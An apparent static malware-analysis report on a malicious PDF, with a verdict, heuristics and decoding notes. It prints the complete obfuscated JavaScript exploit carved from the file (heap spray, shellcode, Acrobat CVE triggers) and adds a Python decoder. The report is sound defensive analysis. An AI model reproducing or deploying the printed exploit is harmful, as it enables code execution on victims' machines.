Verdict: MALICIOUS
Risk Score: 166
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell (analyzer mapping; nothing in the extracted script references PowerShell. What the decoded script actually does is exploit Acrobat JavaScript APIs from inside the viewer, which ATT&CK covers as T1203 Exploitation for Client Execution and T1059.007 JavaScript.)
The PDF file contains embedded JavaScript (PDF_JAVASCRIPT and PDF_JS heuristics). PDF_JS_EXPLOIT_CLUSTER fired because that script is obfuscated: it rebuilds the real code by mapping every character of a long encoded string through a 71-character substitution table and then runs the result with eval(), and the encoded string carries unescape()'d %u-encoded data. The extracted artifact 'javascript_obj0007_000.js' is flagged for script obfuscation on the same grounds. Applying the substitution table shown in the preview by hand yields Acrobat-specific calls (app.viewerVersion, Collab.collectEmailInfo, util.printf, app.doc.Collab.getIcon, app.setTimeOut), a loop that fills an array with padding plus a %u-encoded shellcode blob (a heap spray using 0x0c0c0c0c), and version checks that select which call to trigger. That is a Reader exploit whose payload executes in the viewer process; whether the shellcode then downloads a second stage is not established by this static pass.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (4)
- PDF_JAVASCRIPT: JavaScript action (low, 2 related findings). PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF_JS_EXPLOIT_CLUSTER: PDF JavaScript exploit cluster (critical). PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script (truncated; under the script's substitution table each %oXXXX token is a %uXXXX shellcode unit):
  Nxe{AWr = ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e …
- PDF_JS: Embedded JS stream (low). PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact (medium). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x237 | 8083 bytes |

SHA-256: 3726e00e5374640508f25f806a2113640a6187a274ff46f64ca9ee4f9830e31f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 74 of 113 identifiers look randomly generated, consistent with name-mangling obfuscation. The quoted example 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn' is not actually an identifier but the start of the plain-alphabet string literal the decoder maps into, so the count is slightly inflated; the genuinely mangled names look like B7RQ0JRsvvAz7zge5 and Al2nKJ6fNmZkrWTIpq in the preview below.
Preview script (first 1,000 lines of the extracted script)
function B7RQ0JRsvvAz7zge5(B7RQ0JRsvvAz7zge5,AL7bi9GJbXsyLuvd) {var A93WsshcdAeF=B7RQ0JRsvvAz7zge5. substr (AL7bi9GJbXsyLuvd, 1);return A93WsshcdAeF;}/*xZB1uO358aBd1S5|IYsISF0AmTdnxjQk|RctgWpfwr8o94YISGQlL*/function Al2nKJ6fNmZkrWTIpq(sBimEtTv) {/*lyaFcN|synARXgnDBauAEu|c3NjKyvRakrgC4Kvtyw*/var N4yMgq0rzxMCalnH86Qn = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*MToQV[AVJvQm]eMyT7FtiwQlraWa*//*JbccFsxJt|SeZ4J4G|NED7nzNOhol84uZWMeFA*/var dVpB8tuSetfZhs6 /*yJ6Ti1cc8ZqDdnq[A40fgyZQN]dr1eVpnS8MKaoI0VL*/= new String("nKpZEJ Rgm>heUT2w)8v9YG7zCaf,S5HxD4Bt3MWs0(bQqk<u6cPFjroOid1NX}ALI{lyV.");/*A2mzxdVTRu|fgENXijDL1BXBc|KTXVn*/for(inDWzFwb=0;inDWzFwb<N4yMgq0rzxMCalnH86Qn.length;inDWzFwb++) {if(sBimEtTv == B7RQ0JRsvvAz7zge5(dVpB8tuSetfZhs6, inDWzFwb)) {/*OQMBthUBS4[y8tMhSPsKRFLt]WDfsr26*/return B7RQ0JRsvvAz7zge5(N4yMgq0rzxMCalnH86Qn, inDWzFwb);/*F7rmRs5MOuL86sRLabdg <No9QKr7Dn5Ikmv2]qFkaQiW9zi*/}}return sBimEtTv;}/*RB64Ol3fwld[OY7zBtrWZw6zDeMCUv]lwYfBAZgwAAm*//*YkEZTwvt|simNvoigHJTgpU|F1TF16VQhZp0L*/var lmSUX = new String;var UNCKug = new String("\nOBF P<k8W9Hjrs9o5FIU = uWi mFFB1pZ;\nOBF tL7.Qfv>XkVq>qy1;\nsou3rb6u 2F)>h6{y,C}Nw{eypitTPIBAe9XdHr{SCg ou3.t0UlyT{G8wSCZE\n i(bkW pitTPIBAe9XdHr{SCRkWu0r( * A n ou3.t0UlyT{G8wSCZE\n itTPIBAe9XdHr{SC += itTPIBAe9XdHr{SC;\n J\n itTPIBAe9XdHr{SC = itTPIBAe9XdHr{SCRjotjrFbu0pXg ou3.t0UlyT{G8wSC / AZ;\n FWroFu itTPIBAe9XdHr{SC;\nJ\nsou3rb6u 4Qwdv8msfVhYh(uVpPzTllSmhqTBIH{SCZE\n OBF 2<G.lx6Ds}oF(b1> = XdX3X3X3X3;\n OBF cUweQaz,(Nxe{AWr = 
ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e.%o.ThX%oyVXy%oUTUT%ollUT%oTLmm%oAmlI%oATlh%oll>T%ohTmm%o}XVy%oUTUT%o>TUT%ommlI%oV{T>%o>lUe%o>mlI%oXyTy%oUTVU%oUTUT%ommUh%oAVhT%o>LUT%oh}.}%oAVVm%oU>mT%oVm.y%oUTUT%o.m}X%olIhT%oULmm%oUUV{%olI>l%oTy>m%omTXy%oUTUT%oV{UT%o>yUV%ommUh%oehh>%o>hLI%o}X>h%ohT.m%o>h>T%ommlI%oV{TL%o>lUm%o>mlI%oXyTy%oUThh%oUTUT%oUTV{%o.m}X%olIhT%oUymm%oUeV{%olI>l%oTy>m%oTTXy%oUTUT%oV{UT%olI}X%oTTmm%oUUV{%olI>l%oTy>m%oUTXy%oUTUT%omUUT%o>e>I%oXUUh%oXUUh%oXUUh%oXUUh%oXLlh%o>{U>%olI>h%oXeL{%o>e}V%oXT}X%olI>m%olIXL%oUy.A%o>AlI%o>.UL%o.hlI%olIeL%oT}.>%oUh.y%o>.}h%o..lI%oUhhT%oeh}h%omlAl%oIAmU%oAhUh%oeh>.%oUX}.%oTT{}%o}ee{%oUy.>%oA}AU%oUhUA%omT}e%o}UXI%o}}eI%o.m>}%o>{Xm%oXIlI%o>{lI%oUhh>%oV.LA%oULlI%olImI%oTL>{%oLAUh%oU>lI%oUhlI%o>}Am%oAe>A%oUTUy%o}>Xy%o}X}}%o>m}X%omL>e%omXmA%oUTm}%oyIlV%oyXyI%oATLm%olIAT%oleLX%oL}l}%oyLlU%ol.AU%olllU%oATlT%olhlA%olylT%olhAT%ol}lT%oAUlI%olVyX%oLTyX%olIl.%oL.Le%oXXL}\"Z;\n bs pPzTllSmhqTBIH{SC == }ZE\n 2<G.lx6Ds}oF(b1> = XdLXLXLXLX;\n cUweQaz,(Nxe{AWr = 
ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e.%o.ThX%oyVXy%oUTUT%ollUT%oTLmm%oAmlI%oATlh%oll>T%ohTmm%o}XVy%oUTUT%o>TUT%ommlI%oV{T>%o>lUe%o>mlI%oXyTy%oUTVU%oUTUT%ommUh%oAVhT%o>LUT%oh}.}%oAVVm%oU>mT%oVm.y%oUTUT%o.m}X%olIhT%oULmm%oUUV{%olI>l%oTy>m%omTXy%oUTUT%oV{UT%o>yUV%ommUh%oehh>%o>hLI%o}X>h%ohT.m%o>h>T%ommlI%oV{TL%o>lUm%o>mlI%oXyTy%oUThh%oUTUT%oUTV{%o.m}X%olIhT%oUymm%oUeV{%olI>l%oTy>m%oTTXy%oUTUT%oV{UT%olI}X%oTTmm%oUUV{%olI>l%oTy>m%oUTXy%oUTUT%omUUT%o>e>I%oXUUh%oXUUh%oXUUh%oXUUh%oXLlh%o>{U>%olI>h%oXeL{%o>e}V%oXT}X%olI>m%olIXL%oUy.A%o>AlI%o>.UL%o.hlI%olIeL%oT}.>%oUh.y%o>.}h%o..lI%oUhhT%oeh}h%omlAl%oIAmU%oAhUh%oeh>.%oUX}.%oTT{}%o}ee{%oUy.>%oA}AU%oUhUA%omT}e%o}UXI%o}}eI%o.m>}%o>{Xm%oXIlI%o>{lI%oUhh>%oV.LA%oULlI%olImI%oTL>{%oLAUh%oU>lI%oUhlI%o>}Am%oAe>A%oUTUy%o}>Xy%o}X}}%o>m}X%omL>e%omXmA%oUTm}%oyIlV%oyXyI%oATLm%olIAT%oleLX%oL}l}%oyLlU%ol.AU%olllU%oATlT%olhlA%olylT%olhAT%ol}lT%oAUlI%olVyX%oLTyX%olIl.%oL.Le%oXXL}\"Z;\n J\n WkjW bs pPzTllSmhqTBIH{SC == AZE\n cUweQaz,(Nxe{AWr = 
ouWj3BcWp\"%oILIL%oILIL%oILIL%oXTU>%oLL{>%ollh.%oVX>.%oVXX}%oUTLL%oUAIL%oU>Tm%oUVX{%oTTUh%oTTTT%oV>yT%oeTIU%oUTUT%olIUT%oULmT%o.TlI%oIATL%o.TlI%olUUy%oUTXL%oUTU>%olIUT%o>.XL%ol}Vy%oU}m}%oXyXL%oUT}}%oUTUT%ommll%o>.U>%oyyVy%ol{}}%oXyU}%oUT}T%oUTUT%ommll%o>.Uy%ohmVy%o}X{T%oXyAe%oUTXe%oUTUT%ommll%o>.UL%oXXVy%oXTA}%oXyVT%oUTL>%oUTUT%ommll%o>.TT%oAUVy%oXm.l%oXy{y%oUTA.%oUTUT%ommll%omTT>%oeylT%o.mAh%oll}{%oTymm%oUVXl%oUTUU%o>}UT%o.mll%olIh>%oU>mm%oUUV{%olI>l%oTy>m%oXy>.%oUTlI%oUTUT%oVy>T%oT{e.%o.ThX%oyVXy%oUTUT%ollUT%oTLmm%oAmlI%oATlh%oll>T%ohTmm%o}XVy%oUTUT%o>TUT%ommlI%oV{T>%o>lUe%o>mlI%oXyTy%oUTVU%oUTUT%ommUh%oAVhT%o>LUT%oh}.}%oAVVm%oU>mT%oVm.y%oUTUT%o.m}X%olIhT%oULmm%oUUV{%olI>l%oTy>m%omTXy%oUTUT%oV{UT%o>yUV%ommUh%oehh>%o>hLI%o}X>h%ohT.m%o>h>T%ommlI%oV{TL%o>lUm%o>mlI%oXyTy%oUThh%oUTUT%oUTV{%o.m}X%olIhT%oUymm%oUeV{%olI>l%oTy>m%oTTXy%oUTUT%oV{UT%olI}X%oTTmm%oUUV{%olI>l%oTy>m%oUTXy%oUTUT%omUUT%o>e>I%oXUUh%oXUUh%oXUUh%oXUUh%oXLlh%o>{U>%olI>h%oXeL{%o>e}V%oXT}X%olI>m%olIXL%oUy.A%o>AlI%o>.UL%o.hlI%olIeL%oT}.>%oUh.y%o>.}h%o..lI%oUhhT%oeh}h%omlAl%oIAmU%oAhUh%oeh>.%oUX}.%oTT{}%o}ee{%oUy.>%oA}AU%oUhUA%omT}e%o}UXI%o}}eI%o.m>}%o>{Xm%oXIlI%o>{lI%oUhh>%oV.LA%oULlI%olImI%oTL>{%oLAUh%oU>lI%oUhlI%o>}Am%oAe>A%oUTUy%o}>Xy%o}X}}%o>m}X%omL>e%omXmA%oUTm}%oyIlV%oyXyI%oATLm%olIAT%oleLX%oL}l}%oyLlU%ol.AU%olllU%oATlT%olhlA%olylT%olhAT%ol}lT%oAUlI%olVyX%oLTyX%olIl.%oL.Le%oXXL}\"Z;\n J\n OBF zAArDcaeP9lx{{b> = XdIXXXXX;\n OBF >N7La65.6LYj{}kj = cUweQaz,(Nxe{AWrRkWu0r( * A;\n OBF ou3.t0UlyT{G8wSC = zAArDcaeP9lx{{b> - p>N7La65.6LYj{}kj + XdLVZ;\n OBF itTPIBAe9XdHr{SC = ouWj3BcWp\"%o.X.X%o.X.X\"Z;\n itTPIBAe9XdHr{SC = 2F)>h6{y,C}Nw{eypitTPIBAe9XdHr{SCg ou3.t0UlyT{G8wSCZ;\n OBF <ukBMh6,Dr}3dQ62 = p2<G.lx6Ds}oF(b1> - XdIXXXXXZ / zAArDcaeP9lx{{b>;\n s6F pOBF ze8>A68PF0Qi(S6Q = X; ze8>A68PF0Qi(S6Q n <ukBMh6,Dr}3dQ62; ze8>A68PF0Qi(S6Q ++ ZE\n P<k8W9Hjrs9o5FIU[ze8>A68PF0Qi(S6Q] = itTPIBAe9XdHr{SC + cUweQaz,(Nxe{AWr;\n J\nJ\nsou3rb6u mB8Ou.7YLzN}XuwjpZE\n OBF 0BILzGr2I3eqVL,z = X;\n OBF ju9Ciq<1XkN)42>B = 
BccRObWiWF5WFjb6uRr6frFbu0pZ;\n BccR3kWBF,b<W7orptL7.Qfv>XkVq>qy1Z;\n\n bs pju9Ciq<1XkN)42>B n yR}ZE\n 4Qwdv8msfVhYh(uVpXZ;\n OBF kUMT3HHs.QC2kos7 = ouWj3BcWp\"%oX3X3%oX3X3\"Z;\n i(bkW pkUMT3HHs.QC2kos7RkWu0r( n II.{AZkUMT3HHs.QC2kos7 += kUMT3HHs.QC2kos7;\n r(bj R36kkBtfr6FW = h6kkBtR36kkW3rU<Bbk)us6pE\n jotQ : \"\"g <j0 : kUMT3HHs.QC2kos7\n J\n Z;\n J\nbs pju9Ciq<1XkN)42>B K= .ZE\n rF1 E\nbs pBccRM63Rh6kkBtR0Wr)36uZE\n 4Qwdv8msfVhYh(uVpAZ;\n OBF (}6WkBMOY3UOrzHQ = ouWj3BcWp\"%X.\"Z;\n i(bkW p(}6WkBMOY3UOrzHQRkWu0r( n XdIXXXZ(}6WkBMOY3UOrzHQ += (}6WkBMOY3UOrzHQ;\n (}6WkBMOY3UOrzHQ = \"GR\" + (}6WkBMOY3UOrzHQ;\nBccRM63Rh6kkBtR0Wr)36up(}6WkBMOY3UOrzHQZ;\n 0BILzGr2I3eqVL,z = };\n J\n WkjW E\n 0BILzGr2I3eqVL,z = };\n J\n J\n 3Br3( pWZE\n 0BILzGr2I3eqVL,z = };\n J\n bs p0BILzGr2I3eqVL,z == }ZE\n bs ppju9Ciq<1XkN)42>B K= yR}&& ju9Ciq<1XkN)42>B n .ZZE\n 4Qwdv8msfVhYh(uVp}Z;\n OBF uXN205i6TY{AwqzN = \"}A..................\";\n s6F pcUWHcwahosVulWxQ = X; cUWHcwahosVulWxQ n Ayl; cUWHcwahosVulWxQ ++ ZE\n uXN205i6TY{AwqzN += \"V\";\n J\n orbkRcFbursp\"%I{XXXs\"g uXN205i6TY{AwqzNZ;\n J\n J\n J\nJ\nBccR1H},Li))8G8B.QBo = mB8Ou.7YLzN}Xuwj;\ntL7.Qfv>XkVq>qy1 = BccRjWr,b<W7orp\"BccR1H},Li))8G8B.QBopZ\"g }XZ;\n");/*jvKIXX4C5aJF{quEN05g6xdRDAqt1}KbnUjBseDn4Nsn3dsGU*//*nQbHheHON8GYaut|vbezE|CxC6RuDlYq1*/for(ebRc20=0;ebRc20<UNCKug.length;ebRc20++)lmSUX += Al2nKJ6fNmZkrWTIpq(B7RQ0JRsvvAz7zge5(UNCKug,ebRc20));eval(lmSUX);/*yZU5nh4u5UepUPGyEL[H9PDQAG2]xtOlJihwGbg*/
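The "Obfuscation or payload" verdict above and the preview together give everything needed to unwrap the layer statically, without ever calling eval(): the script looks each character of the encoded string up in the key alphabet (dVpB8tuSetfZhs6) and emits the character at the same index of the plain alphabet (N4yMgq0rzxMCalnH86Qn); characters absent from the key (%, quotes, newlines) pass through unchanged. The Python below is an added example, not the analyzer's output or the malware author's code. The two alphabets and the encoded fragments are copied from the preview; the helper names, the API list and the shellcode conversion are ours.

```python
import re

# Alphabets copied from the preview: N4yMgq0rzxMCalnH86Qn (plain) and
# dVpB8tuSetfZhs6 (key). Same length and no repeated key characters, so a
# dict is equivalent to the script's first-match lookup loop.
PLAIN = "<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
KEY = "nKpZEJ Rgm>heUT2w)8v9YG7zCaf,S5HxD4Bt3MWs0(bQqk<u6cPFjroOid1NX}ALI{lyV."
assert len(PLAIN) == len(KEY) == 71 and len(set(KEY)) == len(KEY)

_DECODE = dict(zip(KEY, PLAIN))


def decode_layer(encoded: str) -> str:
    """Reverse the substitution the way Al2nKJ6fNmZkrWTIpq() does: key char ->
    plain char at the same index; unknown characters pass through."""
    return "".join(_DECODE.get(ch, ch) for ch in encoded)


def unescape_to_bytes(js_string: str) -> bytes:
    """Approximate what unescape() leaves in memory: %uXXXX -> one UTF-16 code
    unit little-endian, %XX -> one byte, anything else -> its latin-1 byte."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", js_string, re.DOTALL):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2):
            out.append(int(m.group(2), 16))
        else:
            out += m.group(3).encode("latin-1", "replace")
    return bytes(out)


def shellcode_from_line(decoded_line: str) -> bytes:
    """Pull the first run of %uXXXX tokens out of a decoded line as raw bytes."""
    m = re.search(r"(?:%u[0-9A-Fa-f]{4})+", decoded_line)
    return unescape_to_bytes(m.group(0)) if m else b""


# Fragments copied verbatim from the encoded string UNCKug in the preview
# (the JS source writes its double quotes as \"; here they are plain quotes).
FRAGMENTS = [
    "OBF P<k8W9Hjrs9o5FIU = uWi mFFB1pZ;",
    "OBF ju9Ciq<1XkN)42>B = BccRObWiWF5WFjb6uRr6frFbu0pZ;",
    "bs pju9Ciq<1XkN)42>B n yR}ZE",
    "h6kkBtR36kkW3rU<Bbk)us6p",
    'orbkRcFbursp"%I{XXXs"g uXN205i6TY{AwqzNZ;',
    "BccRM63Rh6kkBtR0Wr)36u",
    'tL7.Qfv>XkVq>qy1 = BccRjWr,b<W7orp"BccR1H},Li))8G8B.QBopZ"g }XZ;',
    "2<G.lx6Ds}oF(b1> = XdX3X3X3X3;",
    'cUweQaz,(Nxe{AWr = ouWj3BcWp"%oILIL%oILIL%oILIL%oXTU>%oLL{>',
]

# Acrobat/JavaScript names worth flagging once the layer is off. This list is
# our own choice for this sample, not an analyzer signature set.
API_RE = re.compile(
    r"app\.viewerVersion|Collab\.collectEmailInfo|util\.printf|Collab\.getIcon"
    r"|app\.setTimeOut|unescape\(|eval\("
)


def decode_fragments(fragments=FRAGMENTS) -> list:
    return [decode_layer(f) for f in fragments]


def interesting_apis(decoded_text: str) -> list:
    """Sorted, de-duplicated API names found in decoded text."""
    return sorted(set(API_RE.findall(decoded_text)))


if __name__ == "__main__":
    decoded = decode_fragments()
    for enc, dec in zip(FRAGMENTS, decoded):
        print(f"{enc!r:60} -> {dec!r}")
    print("shellcode head:", shellcode_from_line(decoded[-1]).hex(" "))
    print("APIs:", interesting_apis("\n".join(decoded)))
```

Running this turns `OBF` into `var`, `sou3rb6u` into `function`, `ouWj3BcWp` into `unescape(`, and the longer fragments into `app.viewerVersion.toString()`, `if (... < 7.1){`, `Collab.collectEmailInfo(`, `util.printf("%45000f", ...)`, `app.doc.Collab.getIcon` and `app.setTimeOut("app....()", 10)`. The first %u tokens decode to `43 43 43 43 43 43 eb 0f 5b 33`, i.e. an x86 `inc ebx` sled followed by `jmp short` and `pop ebx`, the usual GetPC prologue of position-independent shellcode, which confirms the blob is native code rather than more script. The three Acrobat calls are the publicly documented targets of CVE-2007-5659 (Collab.collectEmailInfo), CVE-2008-2992 (util.printf) and CVE-2009-0927 (Collab.getIcon), selected by the viewer-version checks; that is the "related CVE pattern" the cluster rule refers to. The shellcode bytes are the next thing to disassemble; nothing in the decoded script itself downloads anything.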